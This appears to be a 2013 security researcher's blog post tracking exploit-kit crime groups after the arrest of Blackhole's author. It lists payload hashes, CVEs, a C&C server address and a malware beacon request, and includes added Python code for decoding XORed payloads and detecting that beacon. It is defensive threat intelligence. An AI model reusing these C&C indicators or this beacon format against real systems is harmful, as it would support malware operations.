2013-10-11 - Landscape
Paunch's arrest... The end of an Era!
Image: Spin up of a Supermassive Black Hole. Illustration credit: Robert Hurt, NASA/JPL-Caltech
Note: This post is a work in progress. Not all groups have transitioned yet, so I will update it (if I am able to spot them again) and add links to significant external posts.
Disclaimer: I do not have the telemetry an antivirus or IDS vendor has; with it we could surely have a better picture than this one.
If you are reading this, you already know that Paunch, the coder behind Blackhole, has been arrested.
What I will try to cover here is the transition and the impact of this on the groups using the Blackhole/Cool EK weapon:
the evolution of what I can see from the "driveby battlefield".
The Actors :
Here are the main groups I am aware of who were using Blackhole or Cool EK at the time of the arrest. I will describe the distribution and the threats, but won't talk (maybe only for now) about the way they handle the "whack-a-mole" with the defense side (domains, IPs).
- "Reveton Team" or "Mr.J/MonsterAV" : Cool EK, lately on tcp 1024
Cool EK "Reveton" - 2013-10-07 01:37
Threat : Mainly Reveton (some Live Security Professional?). Hundreds of samples a day. Around 30 threads.
- One Urausy affiliate member (or BestAV itself??) : Cool EK /index.php?p=
Cool EK "Urausy/FakeAV" & Urausy calling home - 2013-10-04 07:00
Threat : Urausy / Fake AV. See: The missing link - Some lights on "Urausy" affiliate - 2013-05-29
- Home Gang (or q.php, or Darkleech fuelled) :
/Home/ Blackhole - 2013-09-30
Filtering IE only, both on the Darkleech side and on the Blackhole itself.
Threat : They were pushing Pony, which was then (depending on your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or the Nymaim.a ransomware). 1 thread, around 30 rotations a day.
See : Late Disclosure - Darkleech Actors /Home/ - some numbers - 2013-10-10 (more reading there)
- Ex-Tkr /i/last Blackhole (or CDorked.A fuelled) :
Ex-Tkr Blackhole pushing Carberp.J (MS) aka Glupteba.G (ESET) - 2013-09-16
Threats : 3 threads, 2 payload families: Carberp.J (200ko) and Leechole (50ko).
More than 240 samples a day (15-20 for Carberp, and around 110 for each of the Leechole threads).
See: Linux/Cdorked.A malware: Lighttpd and nginx web servers also affected - 2013-05-07 - Marc-Etienne M. Léveillé 2013-07-05
- /closest/ Blackhole :
BH EK /closest/ pushing the STI (pay-per-install clickfraud) payload - 2013-09-26
Distribution : Lately, mainly LinkedIn spam redirecting to some compromised WordPress sites.
Threats : Zaccess, Cutwail, STI (pay-per-install clickfraud affiliate tied to Zaccess). They pushed some Cridex in the past too.
- /topic/ - Zeus Game Over gang :
This is the Blackhole with the highest number of threads. Not sure it can be operated by only one guy, or he must be really well organised!
/topic/ BH EK pushing 2 payloads (ZGO & Dipverdle (a loader)) - 2013-09-30
Distribution : Many compromised websites (OT: they are also working a lot via mail attachments)
Threats : More than 60 threads. More than 2000 rotating samples a day.
The main activity is pushing Pony (a different one for many of the threads) as a loader for ZeusGameOver.
But we could also see: Medfos, MagicTraffic (PPI clickfraud tied to Zaccess), some FakeAV, even the Kovter ransomware.
- /ngen/ Blackhole :
/Ngen/ Blackhole pushing Citadel (you can see the call home: /ckt/) and Zaccess - 2013-09-11
Distribution : A lot of compromised websites, with a TDS sharing (hosted with?) the infrastructure of the Blackhole. (/sword/in.cgi may remind you of things)
Threats : Shylock, Zaccess these days (but some Sinowal, Ursnif, Zbot, Citadel in the past too)
- /xlawr/ Blackhole :
/xlawr/ Blackhole pushing FakeRean - 2013-09-27
Distribution : mainly compromised websites.
Threats : 2 threads, around 50 samples a day: Zaccess and FakeRean (855ko).
- Customer "hosted 1" in Rented mode (I will cover the main ones, based on traffic amount and longevity) :
Distribution : Compromised websites, 2 steps (with a JS on another compromised site acting as TDS)
Threat : 1 thread, 3 payloads. For instance :
525226d13a45ade20dafbe9f9c9a2a23 (Pony)
2964a7f348b0bb9cf1c0228faf4b59b5 (Zaccess)
871943c23662e6da246aa34534ba47aa (zbot)
- /news/ Blackhole :
/news/ BH EK pushing Zeus Game Over
Distribution : mainly via spam (lately Pinterest-themed)
Threats : fast rotating thread... hard to follow. Lately pushing ZeusGameOver, but in the past they were pushing Cridex/Bugat, or Inlev.B gathering Tesch.A (Zaccess?), or Ursnif.
Some of their domains : bbb-complaints.org, pinformer.net, cool-mail.net
They are not new in the business : http://blog.dynamoo.com/2012/06/wire-transfer-hp-spam-and.html
Some Urlquery traces
- /vague/ Blackhole :
This Blackhole was hard to find. It was the infector for the Citadel /ppp/ that made some noise for being Japan- and Germany-focused.
Live Infection vector for the Citadel targeting japan illustrated cc @Xylit0l @unixfreaxjp https://t.co/zkDLHV0EDY pic.twitter.com/ahtg3jJQ5l
— kafeine (@kafeine) September 3, 2013
I won't talk about the /adfasdfksjdfn/ Sinowal BH EK (while still reachable, it's not in use anymore), nor about the white/purple Cool EK which is blinking (and quite surely built on a leak of the Cool EK code), nor about the /reveals/ or /news/ Blackhole (except if I spot the groups after transition).
That day: 2013-10-07
BREAKING: Blackhole exploit kit author "Paunch" and his partners arrested in Russia #Blackhole #Paunch #ExploitKit #Malware
— Maarten Boone RCX (@staatsgeheim) October 7, 2013
This was groundbreaking for me... Seeing the source, it could only be true.
That really sounds like... malware now needs coffee... or anxiolytics.
I tried to find some kind of evidence.
Crypt.am down. #Paunch pic.twitter.com/HZKkJ5Nb6S
— kafeine (@kafeine) October 7, 2013
I knew it was up a few days earlier, because I had visited it again after the "Expanding Business: JavaScript Cryptor Offered by Author of Blackhole Exploit Kit" post from Fortinet (2013-10-01).
Two hours after the tweet, the underground started to react.
Verified :
Verified - Cleaning mode - 2013-10-07, a few hours after the tweet went viral.
Exploit.in :
Paunch's Blackhole forum thread : Removed.
Nuclear Pack was no longer advertised on either of these forums, but still on Darkode.
Neutrino author's reaction :
Price increase for non-Russian customers to 10k/month.
<edit:2013-10-11>Now 1 000 000$ per month - See advert here : http://pastebin.com/raw.php?i=6xZDGadQ </edit>
Since then we can see some actors trying to reach Paunch's associates in Cool EK, or to find a new solution:
"желаю Панчу мужества и побыстрее решить проблемы, но несмотря ни на что работать то нужно"
which means something like:
"I wish Paunch courage and a quick resolution of his problems, but no matter what, we need to work"
or
"Ребят, если кто работал с панчем по приватному проекту связки - дайте знать. Я - один из клиентов."
which can be translated as:
"Guys, if anyone has worked with Paunch on a private exploit-kit project, let me know. I am one of the clients."
That same day I tried to take a "photo" of the battlefield state (going on each of the exploit kits illustrated here).
2013-10-07 - between 2 and 3 hours after the news went viral
The Darkleech/Home one is also 502ing.
(I was wondering if the operators are not part of the "partners" mentioned in the tweet.)
ALL exploit kits are using an almost 4-day-old Jar.
In fact that's a simplification, because there are 3 jars (depending on your config), which are :
3bebb777a0b3e7d416a6327a4777b630 - CVE-2013-2465
c61923eb060b42b6d27373b2d44e7839 - CVE-2013-2460
3478966161745cf3401b2a534523a4bc - CVE-2013-0422
Just now :
Sploit folder state in one of those Blackholes - 2013-10-11
The Transition :
- "Reveton Team" or "Mr.J/MonsterAV" :
The redirector linked to the "Tale of the North" iframer restarted the redirect only 5 hours after the tweet, sending traffic to Whitehole.
2013-10-07 - 5 hours after the tweet, the Reveton team has already switched to WhiteHole
That was a weird move, knowing the conversion rate of this exploit kit.
And it did not take long.
The day after, the group was moving again. And what I thought was a Whitehole mutation was more an intermediate state (to avoid losing traffic?) :
Reveton team transitioning from WhiteHole (tcp 2780) to... something new on tcp 80 - 2013-10-08. Pro transition! No interruption.
And here is the Reveton group in its state today :
Angler EK pushing Reveton - 2013-10-08
I won't make a full post about what we will call Angler EK. One-Jar exploit kit for now.
XORing the payload with a key easily found on the landing. No JSdetect. For sure it's an emergency solution.
Why Angler EK? Because we can't name this a Monster EK.
Advert for Reveton/Live Security Pro distribution (nice angler fish!)
Files: Angler EK Fiddler (owncloud via goo.gl)
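As an added illustration (not code from the original post, and not Angler's actual landing or payload format), here is the kind of decoder an analyst writes for a kit that XORs its payload with a key exposed on the landing page. The landing snippet, the JavaScript variable name `key`, the key value and the fake PE blob are all constructed for the example; the PE-header check is what tells you the key was right, and the single-byte brute force is a generic fallback for when the key is not on the landing.

```python
import re
from itertools import cycle

# CONSTRUCTED landing-page stand-in. The variable name "key" and its value are
# assumptions for the example, not Angler's real landing format.
SAMPLE_LANDING = (
    '<html><script>var u="/dl.php?id=1";var key="s3cr3t";'
    'go(u,key);</script></html>'
)

# Pull the XOR key out of the landing page (assumed form: var key="...").
KEY_RE = re.compile(r'var\s+key\s*=\s*"([^"]+)"')


def extract_key(landing_html):
    m = KEY_RE.search(landing_html)
    if not m:
        raise ValueError("no XOR key found on the landing page")
    return m.group(1).encode()


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_payload(landing_html, blob):
    """Decode blob with the key from the landing; report whether a PE came out."""
    decoded = xor_bytes(blob, extract_key(landing_html))
    return decoded, looks_like_pe(decoded)


def recover_single_byte_key(blob):
    """Fallback when the key is not on the landing: brute-force a 1-byte key
    and accept the first one that yields a well-formed PE header."""
    for k in range(256):
        if looks_like_pe(xor_bytes(blob, bytes([k]))):
            return k
    return None


def build_fake_pe():
    """CONSTRUCTED minimal PE-shaped blob: MZ header, e_lfanew=0x40, PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3A)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # extends the buffer to 0x40 bytes
    return bytes(hdr) + b"PE\0\0" + b"\0" * 16


# What the kit would serve: the fake PE, XORed with the key from the landing.
SAMPLE_PAYLOAD = xor_bytes(build_fake_pe(), b"s3cr3t")

if __name__ == "__main__":
    decoded, is_pe = decode_payload(SAMPLE_LANDING, SAMPLE_PAYLOAD)
    print("key:", extract_key(SAMPLE_LANDING), "decoded to PE:", is_pe)
    print("1-byte fallback key:", recover_single_byte_key(xor_bytes(build_fake_pe(), b"\x5a")))
```

Because XOR is its own inverse, the raw bytes served by the kit never show an `MZ` header, which is why plain signature scanning of the download misses it; the header check after decoding is the cheap, reliable confirmation that you recovered the right key.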
- Ex-Tkr /i/last Blackhole (or CDorked.A fuelled) :
Reading this : Close encounter with Linux/Cdorked.A - Kimberly - 2013-10-13 - Stopmalvertising
It seems this group has moved to Neutrino (>> seems like those guys speak Russian :) ). Same infection source (compromised websites with CDorked.A), same TDS and domain pattern.
Thanks Kimberly for the solid referer.
Ex-TKR Neutrino thread - 2013-10-14 - pushing quite surely Carberp.J/Glupteba.G
One more : 0622efb24e8436d50d14f387fdb31fac
And one more pass (from FR, to get the Leechole)
Ex-TKR Neutrino thread - 2013-10-14 - pushing maybe Leechole
But the calls are slightly different (an upgrade? something else?) :
-----C&C-----
144.76.84.132 tcp 8000
GET /stat?uptime=100&downlink=1111&uplink=1111&id=0002D9BC&statpass=bpass&version=20131011&features=30&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0
(via Joe Sandbox Cloud)
-----------------------
Files: 3 payloads (owncloud via goo.gl). Would love any feedback on those samples.
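An added example (not from the original post) of turning the check-in above into detection logic: parse proxy-log request lines, match the `/stat` path carrying the full set of query parameters seen in the capture, and pull out the fields worth pivoting on (id, guid, version). The log line format and every line except the first request are constructed for the example; the first request line is the one quoted above.

```python
from urllib.parse import urlsplit, parse_qs

# Query parameters present in the check-in captured above. A request is flagged
# only when it hits /stat AND carries all of them; a partial match is not enough,
# so ordinary "/stat?page=..." URLs do not fire.
REQUIRED_PARAMS = {"uptime", "downlink", "uplink", "id", "statpass", "version", "guid"}

# CONSTRUCTED proxy-log extract: "<timestamp> <client> <server:port> <request line>".
# Line 1 reuses the request captured above; the other lines are benign noise.
SAMPLE_LOG = """\
2013-10-14T10:01:02Z 192.0.2.10 144.76.84.132:8000 GET /stat?uptime=100&downlink=1111&uplink=1111&id=0002D9BC&statpass=bpass&version=20131011&features=30&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0
2013-10-14T10:01:05Z 192.0.2.10 198.51.100.7:80 GET /stat?page=home&ref=mail HTTP/1.1
2013-10-14T10:01:09Z 192.0.2.11 198.51.100.9:80 POST /login HTTP/1.1
2013-10-14T10:01:12Z 192.0.2.12 198.51.100.9:80 GET /stat?uptime=5&id=1 HTTP/1.1
"""


def match_beacon(request_line):
    """Return the parsed check-in fields if request_line matches the beacon shape, else None."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    if url.path != "/stat":
        return None
    # keep_blank_values so the trailing "s=" survives as an (empty) parameter
    qs = parse_qs(url.query, keep_blank_values=True)
    if not REQUIRED_PARAMS.issubset(qs):
        return None
    return {k: v[0] for k, v in qs.items()}


def scan_log(text):
    """Walk the log and collect one record per matching check-in."""
    hits = []
    for line in text.splitlines():
        fields = line.split(maxsplit=3)
        if len(fields) != 4:
            continue
        ts, client, server, request = fields
        info = match_beacon(request)
        if info:
            hits.append({
                "ts": ts, "client": client, "server": server,
                "id": info["id"], "guid": info["guid"], "version": info["version"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The `version` and `comment` values in the capture both read `20131011`, the build date, so the version field is a cheap way to spot a rebuilt client after the kit switch; the `guid` is what you pivot on to count distinct infected hosts behind a single egress address.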
- /news/ Blackhole :
They are back, on Magnitude. By mail again (Pinterest stuff).
/news/ Blackhole operators are now on Magnitude - 2013-10-16
Here :
ebfe57976c5840a578dd60f9974186
c4d71b94cfe3adbba8f43d927a0d8a
35a613825af980eb1010e8462d5acc
From the US, the same pass dropped me a 4th payload, which was : aa0f08a3fab179a071b1576fd3755a8e (Tesch.B)
Files: 3 payloads (owncloud via goo.gl). Would love any feedback on the first two samples.
See also : Cutwail Spam Swapping Blackhole for Magnitude Exploit Kit - 2013-10-18 - Dell SecureWorks CTU
- /vague/ Blackhole :
They moved to Nuclear Pack. Here in action :
Nuclear Pack (rejecting non-JP traffic) pushing Citadel - 2013-10-27
Payload : d6ed9120d489227c7195cb792581f068
- Home Gang (or q.php, or Darkleech fuelled) :
No exploit kit spotted for now.
Read: Nymaim: Browsing for trouble - 2013-10-23 - Jean-Ian Boutin - ESET
- /topic/ - Zeus Game Over gang :
No exploit kit spotted for now.
ZGO keeps spreading via mail attachments (source : Dell SecureWorks), now using Upatre.
Read: Upatre: Another Day Another Downloader - Brett Stone-Gross and Russell Dickerson - 2013-10-04
- /ngen/ Blackhole :
"Ngen" Sutra (TDS) sending traffic to Nuclear Pack. Threats : Zaccess (SmartPrivate) & Shylock - 2013-11-26
6123a7fde34de0237c644e5e1381af50 Zaccess
5c446faa9ebebfc9de85dc84c7559d07 Shylock
- /closest/ :
----
--- That's all folks. For now ---
If you have any intel, information or question about this, I'd love to hear about it. [email protected]
---------------------------------
Clarification: I did not contact the media, as has been written here or there. I only replied to questions I received in my mailbox following some tweets (please consider that before thinking "media whore").
PS : Sharing is part of our defenses. Crediting is part of the trust/sharing process. You can freely use data from here but please, don't be a douchebag: credit your source. Each time I see/read/hear someone bragging with data he easily gathered here (without crediting)... the idea "stop the share" pops into my mind.
Reading :
2013-12-06 - Google Translate of the Official Announcement - Russian Ministry of Internal Affairs
2013-12-06 - Group-IB assists to suppress activities of the “Blackhole” exploit-kit author, said “Paunch” is arrested - Group IB